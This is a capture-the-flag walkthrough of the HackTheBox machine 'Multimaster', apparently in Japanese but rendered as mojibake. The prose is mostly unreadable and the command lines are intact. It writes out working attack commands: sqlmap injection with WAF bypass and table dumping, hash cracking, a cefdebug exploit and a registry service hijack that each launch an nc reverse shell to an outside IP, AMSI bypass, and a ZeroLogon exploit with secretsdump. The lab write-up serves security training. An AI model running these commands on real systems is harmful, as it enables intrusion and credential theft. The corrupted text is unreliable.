ããã«ã¡ã¯ãã©ã«ãã¯ããªããšäžç·ã§ããç§ã¯HackTheBoxãµã€ããããã·ã³ã®ãã¡ã€ãã©ã€ãºã«éä¿¡ããããœãªã¥ãŒã·ã§ã³ãå ¬éãç¶ããŠããŸãã
ãã®èšäºã«ã¯ãããããããŸãã Burp Suiteãšsqlmapã䟿å©ã«çµã¿åãããæ¹æ³ããã¡ã€ã³ãŠãŒã¶ãŒã«MSSQLãžã®ã¢ã¯ã»ã¹æš©ãäžããæ¹æ³ãVisual Studioã³ãŒãã®è匱æ§ãæªçšããæ¹æ³ãAMSIããããã¯ããæ¹æ³ãAS-REPããŒã¹ããå®è¡ããŠè³æ Œæ å ±ãååŸããæ¹æ³ãããã³ServerOperatorsã°ã«ãŒãããç¹æš©ãå¢ããæ¹æ³ãèŠãŠã¿ãŸãããããŸããæ°ããZeroLogonã®è匱æ§ã®ãã¢ã³ã¹ãã¬ãŒã·ã§ã³ãšããŠãåããã·ã³ãç°ãªãæ¹æ³ã§5å以å ã«ãã£ããã£ããŸãã
ã©ããžã®æ¥ç¶ã¯VPNçµç±ã§ããæ å ±ã»ãã¥ãªãã£ã«ã€ããŠäœããç¥ã£ãŠãã人ã ãšã®ãã©ã€ããŒããããã¯ãŒã¯ã«ããããšã«æ°ä»ããããä»äºçšã®ã³ã³ãã¥ãŒã¿ãéèŠãªããŒã¿ããããã¹ãããã¯æ¥ç¶ããªãããšããå§ãããŸãã
çµç¹æ
å ±
åµå¯
ãã®ãã·ã³ã®IPã¢ãã¬ã¹ã¯10.10.10.179ã§ãããã/ etc / hostsã«è¿œå ããŸãã
10.10.10.179 multimaster.htb
æåã®ã¹ãããã¯ãéããŠããããŒããã¹ãã£ã³ããããšã§ããnmapã§ãã¹ãŠã®ããŒããã¹ãã£ã³ããã®ã«é·ãæéããããã®ã§ãæåã«masscanã䜿çšããŠã¹ãã£ã³ããŸããtun0ã€ã³ã¿ãŒãã§ã€ã¹ãããã¹ãŠã®TCPããŒããšUDPããŒããæ¯ç§500ãã±ããã§ã¹ãã£ã³ããŸãã
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.179 --rate=500
ãã¹ãäžã§å€ãã®ããŒããéããŠããŸããããã§ã¯ãnmapã§ããããã¹ãã£ã³ããŠãå¿ èŠãªãã®ããã£ã«ã¿ãªã³ã°ããŠéžæããŸãããã
nmap multimaster.htb -p593,49674,139,5985,49744,445,636,80,49667,3268,464,389,53,135,88,9389,3269,49676,49666,49699,49675,3389
ããã§ãããŒãã§å®è¡ããããµãŒãã¹ã«é¢ãã詳现æ å ±ãååŸããã«ã¯ã-Aãªãã·ã§ã³ãæå®ããŠã¹ãã£ã³ãå®è¡ããŸãã
nmap -A multimaster.htb -p593,139,5985,445,636,80,3268,464,389,53,135,88,9389,3269,3389
SMBãšLDAPã§ã¯äœãã§ããŸãããWebãèŠãŠã¿ãŸãããã
ãã®ãµã€ãã«ã¯ãæ¿èªãšæ€çŽ¢ãã©ãŒã ããããŸãã
ããã«ãæ€çŽ¢ã¯ãšã³ããªã«ãã£ãŠæ©èœããŸãã
ãããã£ãŠãSQLã¯ãšãªã§ã¯LIKEæŒç®åã䜿çšãããŠãããšæ³å®ã§ããŸãããããã£ãŠããã¹ãŠã®ã¬ã³ãŒãã衚瀺ããŠã¿ãããšãã§ããŸãã
SQLã€ã³ãžã§ã¯ã·ã§ã³ãããããšãããããŸããã
ããããå°ãªããšãäœããããŸããããŸãããã©ãããWAFã䜿çšãããŠããŸãã
ããããUnicodeãšã³ã³ãŒãã£ã³ã°ã䜿çšããŠããããããã€ãã¹ãããŠããããšãå€æããŸããã
ãããŠãåã®æ°ãèŠã€ããŸãã
ãããã£ãŠãæ³šå ¥ã¯100ïŒ ã§ãã
Sqlmap + Burp Suite
ããŒã¿ããŒã¹ãç°¡åã«æäœããããã«ãsqlmapã䜿çšããŸããã³ãŒãã£ã³ã°æ¹æ³ãšDBMSã¯ããã£ãŠããŸããããããã©ã¡ãŒã¿ãŒã«åæ ããŸãããŸããBurp Suiteããã®ãªã¯ãšã¹ãããã¡ã€ã«ã«ä¿åãããã®sqlmapãæå®ããŸãããªã¯ãšã¹ããè¡ããããŠãŒã¶ãŒãå®çŸ©ããŸãããã
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --current-user
æ®å¿µãªãããã³ãŒãã£ã³ã°ã䜿çšããªããŠãåãçããåŸãããŸãããsqlmapã®ãããã·ãšããŠBurpãæå®ããŸãããããããŠãæéãç¡é§ã«ããªãããã«ãUnionããŒã¹ã®ã³ãŒãã€ã³ãžã§ã¯ã·ã§ã³ææ³ïŒãã©ã¡ãŒã¿ãŒUïŒã瀺ããŸãã
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U -proxy http://127.0.0.1:8080 --current-user
ãªã¯ãšã¹ããburpã§ã€ã³ã¿ãŒã»ãããããšããšã³ã³ãŒãã£ã³ã°ã®è¡šç€ºããããã«ç°ãªããŸãã
ãããæ©èœãããã©ããã確èªããŸãããããã®æ¹æ³ã§ããã§ã«ããã£ãŠããè² è·ããšã³ã³ãŒãããŠã¿ãŸãããã
ãããŠãããã¯æ©èœããŸããããããã£ãŠããšã³ã³ãŒãã£ã³ã°ã®è¡šç€ºãå€æŽããå¿ èŠããããŸããããã¯ãBurpã䜿çšããŠå®è¡ã§ããŸãã[ãããã·]-> [ãªãã·ã§ã³]ã¿ããš[äžèŽãšçœ®æ]ã»ã¯ã·ã§ã³ã«ç§»åããŸãããã
ãªã¯ãšã¹ãæ¬æã§ïŒ uã\ uã«å€æŽããã«ãŒã«ãè¿œå ããŸãããã
ãããŠããããã¢ã¯ãã£ãã§ããããšã確èªããŠãã ããã
ããã§ã¯ãsqlmapãããäžåºŠå®è¡ããŠã¿ãŸãããã
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U -proxy http://127.0.0.1:8080 --random-agent --current-user
Burpã«ã¯ããã§ã«ä¿®æ£ããããªã¯ãšã¹ãããããŸãã
ãã¹ãŠã®ãªã¯ãšã¹ãã®éä¿¡ãèš±å¯ããŸãããããŠsqlmapã§ãçŸåšã®ãŠãŒã¶ãŒã®ååãååŸããŸãã
ããããããã§ããšã©ãŒãçºçããŸããã©ãããWAFã3ç§ã®é 延ãè¿œå ããŠãç¹æš©ã調ã¹ãŠã¿ãŸãããã
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U -proxy http://127.0.0.1:8080 --delay=3 --random-agent --privileges
ç§ãã¡ã«ã§ããããšã¯äœããããŸãããããŒã¿ããŒã¹ã調ã¹ãŠã¿ãŸãããã
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U -proxy http://127.0.0.1:8080 --delay=3 --dbs
Hub_DBã®ããŒãã«ãèŠãŠã¿ãŸãããã
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U -proxy http://127.0.0.1:8080 --delay=3 -D Hub_DB --tables
ãŸãã«å¿ èŠãªãã®ããã°ã€ã³ããŒãã«ããããããã¹ãŠã®ããŒã¿ãæœåºããŸãããã
sqlmap -r r.req --tamper=charunicodeencode --dbms=mssql --technique=U -proxy http://127.0.0.1:8080 --delay=3 -D Hub_DB -T Logins --dump
ãã®ããããŠãŒã¶ãŒãšãã¹ã¯ãŒãã®ããã·ã¥ããããŸãã4ã€ã®ç°ãªãããã·ã¥ãã¹ãŠãããã«ãããŸããã©ããèŠã€ããŸãããã
ããã§ãç¹°ãè¿ãããã·ã¥ãã£ããã¢ãŒããèŠã€ããŸãã
å šéšã§3ã€ã®ã¢ãŒãããããŸãããããŠåŸè ã䜿çšããŠã3ã€ã®ããã·ã¥ãå£ããŸãã
hashcat -a 0 -m 17900 hashes.txt ./tools/rockyou.txt
ãã ãããããã®ããã·ã¥ã¯SMBã«ã¯é©ããŠããŸãããããã«æãäžããŸãã
ãŠãŒã¶ãŒ
MSSQLããããŒã¿ãååŸã§ãããšããäºå®ã«ããããã¡ã€ã³ãŠãŒã¶ãŒãååŸããããšãã§ããŸãããããè¡ãæ¹æ³ã玹ä»ããŸãããŸãããã¡ã€ã³åãååŸããå¿ èŠããããŸãã
ãããŠä»ããã®SIDãèŠã€ããå¿ èŠããããŸãããã¡ã€ã³ãªããžã§ã¯ãã®SIDãèŠã€ããŠãããããRIDãç Žæ£ããããšã«ããããã¡ã€ã³ã®SIDãååŸã§ããŸããã©ã®ãã¡ã€ã³ã«ãDomainAdminsã°ã«ãŒãããããŸããããã«ããããã¡ã€ã³ãªããžã§ã¯ãã«ãã§ã«ååšããããšãã§ããŸãã圌ã®SIDã調ã¹ãŠã¿ãŸãããã
ãããã£ãŠããšã³ã³ãŒããããŸããæ£åžžã«è¡šç€ºããã«ã¯ãsys.fn_varbintohexstré¢æ°ã䜿çšããŸãã
ãããŠããã®ãªããžã§ã¯ãã®SIDãååŸããŸããããã«ãã¢ã€ãã¢ã¯æ¬¡ã®ãšããã§ãããã¡ã€ã³ã®SIDãååŸããããŸããŸãªRIDã«çœ®ãæããŠãæ¢åã®SIDã§ãŠãŒã¶ãŒåãååŸããŸããããšãã°ã管çè ã®RIDã¯500
ã§ããåä¿¡ããSIDãããæåã®48ãã€ããååŸããŸãã
ãããŠæåŸã«ãRID-500ãè¿œå ããŸãïŒè£è¿ãããšãå¿ããªãã§ãã ããïŒã
ãããŠä»ãç§ãã¡ã¯ç§ãã¡ã®SIDã«ãã£ãŠã¢ã«ãŠã³ãåãååŸããŸãã
ãããæ©èœããã®ã§ããã¡ã€ã³ãªããžã§ã¯ããååŸããŸããããç¹°ãè¿ãã«ã¯ãBurpIntruderã䜿çšããŸãã
Intruderã«ãªã¯ãšã¹ããéä¿¡ããããšã«ãããå€æ°ã4ãã€ãå²ãåœãŠãŸãã次ã«ããããã®4ãã€ãã®å€æ°ãçæããå¿ èŠããããŸãã
for i in range(1100, 9100,1000):
for j in range(50):
h = hex(i+j)[2:].rjust(4,'0')
SID = ""
for c in (h[2:]+h[:2]):
SID += "0x" + hex(ord(c))[2:]
print(SID)
çµæããã¡ã€ã«ã«ä¿åããBurpããã€ã³ãããŸãã
ãŸããURLãšã³ã³ãŒãã£ã³ã°ããªãã«ãããã¹ãŠã®0xã\ u00ã«çœ®ãæããŸãã
WAFã«ã€ããŠèŠããŠãããŠãã ãããç§ãã¡ã¯1ã€ã®ã¹ããªãŒã ãšãªã¯ãšã¹ãéã®é 延ã眮ããŸãã
æ»æãéå§ããå¿çã®é·ãã§äžŠã¹æ¿ããŠãå€ãã®ãªããžã§ã¯ãã芳å¯ããŸãã
ãã¹ãŠã®ãŠãŒã¶ãŒãéžæããŠãã¡ã€ã«ã«ä¿åããŸãã3ã€ã®ãã¹ã¯ãŒãããããŸããSMBãç¹°ãè¿ãåŠçããæ£ãããã¢ãèŠã€ããŸãã
WinRMã«æ¥ç¶ããã·ã¹ãã å ã«ããŸãã
USER2
ã·ã¹ãã ã«å ¥ããšãåµå¯ãè¡ããŸããç§ã¯winPEASã䜿çšããŠãããè¡ã£ãŠããŸãããã·ã³ã«ããŒãããŠå®è¡ããŸãã圌ãã¯ããã«äœãé¢çœããã®ãèŠã€ããŸããã§ããã
ããã§ã¯ãé£ããéãé²ã¿ãŸããããã§ããã ãå€ãã®è³æ Œæ å ±ãååŸããå¿ èŠããããŸããã·ã¹ãã äžã«ãããŠãŒã¶ãŒåããå§ããŸãããã
ãã¹ãŠããã¡ã€ã«ã«ä¿åããŸããããããã©ãã§ãã¹ã¯ãŒããèŠã€ããããšãã§ããŸããïŒãµãŒããŒã¯ããŒã¿ããŒã¹ã䜿çšããŠããããµãŒããŒã«æ¥ç¶ããã«ã¯ãã¹ã¯ãŒããå¿ èŠã§ããå ¥æããŠã¿ãŸãããã
ãã ããWebãµãŒããŒãã£ã¬ã¯ããªã«å¯Ÿããæš©éã¯ãããŸãããäœããã¹ããããããªãã£ãã®ã§ããµãŒããŒã§äœ¿çšãããŠãããœãããŠã§ã¢ã®äœçœ®ã¯ç§ã®ãªã¹ãã§éããããŠããŸããã§ãããããã»ã¹ã®ãªã¹ããèŠãŠã¿ãŸãããã
ãããŠVSCodeãç®ãåŒããŸãã
ãããã£ãŠãVisual Studio Code1.37.1ããµãŒããŒäžã§å®è¡ãããŠããŸãããŸããã³ãŒãã®å®è¡ãå¯èœã«ããè匱æ§ããããŸãããããã
次ã®ããã«ïŒ
Visual Studio CodeãããŒã«ã«ã³ã³ãã¥ãŒã¿ã®ãŠãŒã¶ãŒã«ãããã°ãªã¹ããŒãå ¬éãããšãç¹æš©ã®ææ Œã®è匱æ§ãååšããŸãã
æ»æè ã¯ãçŸåšã®ãŠãŒã¶ãŒã®ã³ã³ããã¹ãã§å®è¡ããä»»æã®ã³ãŒããæ¿å ¥ããŠãããè¡ãããšãã§ããŸããæ»æè ã¯ãVisual StudioCodeããªãã¹ã³ããŠããããŒããç¹å®ããå¿ èŠããããŸããcefdebugã䜿çšããŠVSCodeããŒãã«æ¥ç¶ã§ããŸãã
ãªã¹ãã³ã°ããŒããèŠã€ããŸãããã
çŽ æŽãããããã®ãããªããŒãããããŸããVSCodeããã»ã¹ã®ã³ã³ããã¹ãã§ã³ãŒããå®è¡ããŠã¿ãŸããããncã䜿çšããŠããã¯ã³ãã¯ãã·ã§ã«ãå®è¡ããŠã¿ãŸãããã
.\cefdebug.exe --url ws://127.0.0.1:43819/da4e5078-2eaf-4b30-bac1-96370f4d2b3d --code "process.mainModule.require('child_process').exec(cmd.exe /c C:\Temp\nc64.exe -e cmd.exe 10.10.15.60 4321)"
ãããŠãæ¥ç¶ãæåããŸããã
ãã£ã¬ã¯ããªã«ç§»åããŸãã
æ瀺ããããã¹ãŠã®äžã§ãAPIã¯æ倧ã®é¢å¿äºã§ããããŠã³ããŒãããŸãããã
ç§ã¯Windowsã«è¡ããã©ã€ãã©ãªãäœã§æžãããŠãããã確èªããŸããã
ããã¯CïŒãªã®ã§ããããžã§ã¯ããéã³ã³ãã€ã«ã§ããŸããdnSpyã䜿çšããŠããŸãã
ãããŠããœãŒã¹ã³ãŒãã§ãã¹ã¯ãŒããèŠã€ããŸãããããã圌ãã©ã®ãŠãŒã¶ãŒã§ããããç¥ãããã«ããã«ãŒããã©ãŒã¹ãã°ã€ã³ïŒãã¹ã¯ãŒãã¹ãã¬ãŒïŒã䜿çšããŸããCrackMapExecã䜿çšããŠããŸãã
cme smb multimaster.htb -u users.txt -p "D3veL0pM3nT!"
ãããŠãã1人ã®ãŠãŒã¶ãŒãé£ããŠè¡ããŸã
USER3
ã€ã³ããªãžã§ã³ã¹ããŒã«ãããŠã³ããŒãããŠäœ¿çšããããšãããšãAMSIã«ãã£ãŠãããã¯ãããŸããInvoke-AlokS-AvBypassã§ããããåœãŠãŸãããã
ããã§ãsharphoundããã¹ãã«å®å šã«ã¢ããããŒãã§ããŸãã
ãããŠãéå§åŸãã¢ãŒã«ã€ãã芳å¯ããŸãã
次ã«ããããããŒã«ã«ãã¹ãã«ããŠã³ããŒããããã©ããããŠã³ãã«ããããããŸãã次ã«[ã¯ãšãª]ã§ã[䟡å€ã®é«ãã¿ãŒã²ãããžã®æçãã¹]ãéžæããŸãã
ã°ã©ããæãäžããŠãå¶åŸ¡äžã®ãŠãŒã¶ãŒãšãã¡ã€ã³ã®å¥ã®ãŠãŒã¶ãŒãšã®é¢ä¿ãå€å¥ããŸãã
éä¿¡æ å ±ãååŸããŸãããã
ãããã£ãŠããŠãŒã¶ãŒã®ãã¹ã¯ãŒãã®ããã·ã¥ãååŸã§ããŸãïŒããã»ã¹èªäœã¯2ã€ã®åæ§ã®èšäºã§ãã§ã«èª¬æãããŠããŸãïŒãããããã£ãæå¹ã«ããŸã-Kerberosã®äºåèªèšŒã¯å¿ èŠãããŸããã
ãããŠããªã¯ãšã¹ããå®è¡ããŸãã
ããã·ã¥ãã³ããŒããhashcatã䜿çšããŠåå²ããŸãã
hashcat -a 0 -m 18200 krb_hashes.txt ./tools/rockyou.txt
ãŠãŒã¶ãŒã®ãã¹ã¯ãŒããååŸããŸãããããŠãç§ãã¡ã¯ããŸããã®äžã«è¡ããŸãã
ã«ãŒã
ãŠãŒã¶ãŒã«é¢ããæ å ±ãåãåã£ãåŸã圌ãServerOperatorsã°ã«ãŒãã®ã¡ã³ããŒã§ããããšãããããŸããã
ãã®ã°ã«ãŒãã®ã¡ã³ããŒã¯ããµãŒãã¹ãæ§æããã³å®è¡ã§ããŸãïŒããã³ãWindowsã®ãµãŒãã¹ã¯SYSTEMã«ä»£ãã£ãŠå®è¡ãããŸãïŒãããã¯éåžžãSensorDataServiceãä»ããŠè¡ãããŸãã
netcatã䜿çšããŠletãexecutableã«å€æŽããŠbackconnectã³ãã³ãã«ããŸãããã
reg add "HKLM\System\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Temp\nc64.exe -e powershell 10.10.15.60 4321" /f
ãããŠããµãŒãã¹ãéå§ããåŸãããŒã4321ãžã®æ¥ç¶ã確èªããŸãã
sc.exe start SensorDataService
ç§ãã¡ã¯ã·ã¹ãã ã§ãã
CVE-2020-1472
ãããŠä»ããã¢ã³ã¹ãã¬ãŒã·ã§ã³ã®ããã«ããšã³ããªãã€ã³ããšãµããŒãããªããŠããããã«ãã¡ã€ã³ã³ã³ãããŒã©ããã£ããã£ããŠã¿ãŸãããããããè¡ãããã«ãæè¿æªåé«ãZeroLogonã®è匱æ§ïŒCVE-2020-1472ïŒã䜿çšããŸãã
æŠããŠãCVE-2020-1472ã®è匱æ§ã¯ãNetlogonãªã¢ãŒããããã³ã«æå·åèªèšŒã¹ããŒã ã®äžå®å šãã«ãããŸãããã®ãããã³ã«ã¯ããã¡ã€ã³ããŒã¹ã®ãããã¯ãŒã¯ã§ãŠãŒã¶ãŒãšãã·ã³ãèªèšŒããããã«äœ¿çšãããŸããç¹ã«ãNetlogonã¯ãã³ã³ãã¥ãŒã¿ãŒã®ãã¹ã¯ãŒãããªã¢ãŒãã§æŽæ°ããããã«ã䜿çšãããŸãããã®è匱æ§ã«ãããæ»æè ãã¯ã©ã€ã¢ã³ãã³ã³ãã¥ãŒã¿ãŒã«ãªãããŸããŠããã¡ã€ã³ã³ã³ãããŒã©ãŒã®ãã¹ã¯ãŒãããªã»ããããå¯èœæ§ããããŸãã
ãã¹ãã®ããã«ãããã·ã¥31d6cfe0d16ae931b73c59d7e0c089c0ïŒç©ºã®ãã¹ã¯ãŒãïŒã䜿çšããŠè³æ Œæ å ±ã®è€è£œãèŠæ±ããŠã¿ãŸãããã
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'MEGACORP/MULTIMASTER$@10.10.10.179'
ããã§ã¯ããšã¯ã¹ããã€ãã䜿çšããŸãããã
CVE-2020-1472.py MULTIMASTER MULTIMASTER$ 10.10.10.179
æ»æãæåããããšãéç¥ãããŸããè³æ Œæ å ±ã®è€è£œãå床èŠæ±ããŸãããããŠãç§ãã¡ã¯ããããååŸããŸãã
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'MEGACORP/MULTIMASTER$@10.10.10.179'
ãŸãã管çè ããã·ã¥ã䜿çšãããšãWinRMçµç±ã§æ¥ç¶ã§ããŸãã
ç¹ã«ãããã¯ã以äžã«åºã¥ããŠãã¡ã€ã³ã³ã³ãããŒã©ãŒããã£ããã£ããæ¹æ³ã§ãã
- Windows Server 2019ãWindows Server2016ã®ãã¹ãŠã®ããŒãžã§ã³ã
- WindowsServerããŒãžã§ã³1909ã®ãã¹ãŠã®ããªã¢ã³ã
- Windows ServerãããŒãžã§ã³1903
- Windows ServerãããŒãžã§ã³1809ïŒããŒã¿ã»ã³ã¿ãŒãæšæºïŒ
- Windows Server 2012 R2
- Windows Server 2012
- Windows Server 2008R2ãµãŒãã¹ããã¯1ã
Telegramã« åå ã§ããŸããããã«ã¯ãèå³æ·±ãè³æããªãŒã¯ãããã³ãŒã¹ãããã³ãœãããŠã§ã¢ããããŸããITã®å€ãã®åéã«ç²ŸéããŠãã人ã ãããã³ãã¥ããã£ãéããŸããããããããã°ãITãšæ å ±ã®ã»ãã¥ãªãã£ã®åé¡ã«ã€ããŠãã€ã§ãäºãã«å©ãåãããšãã§ããŸãã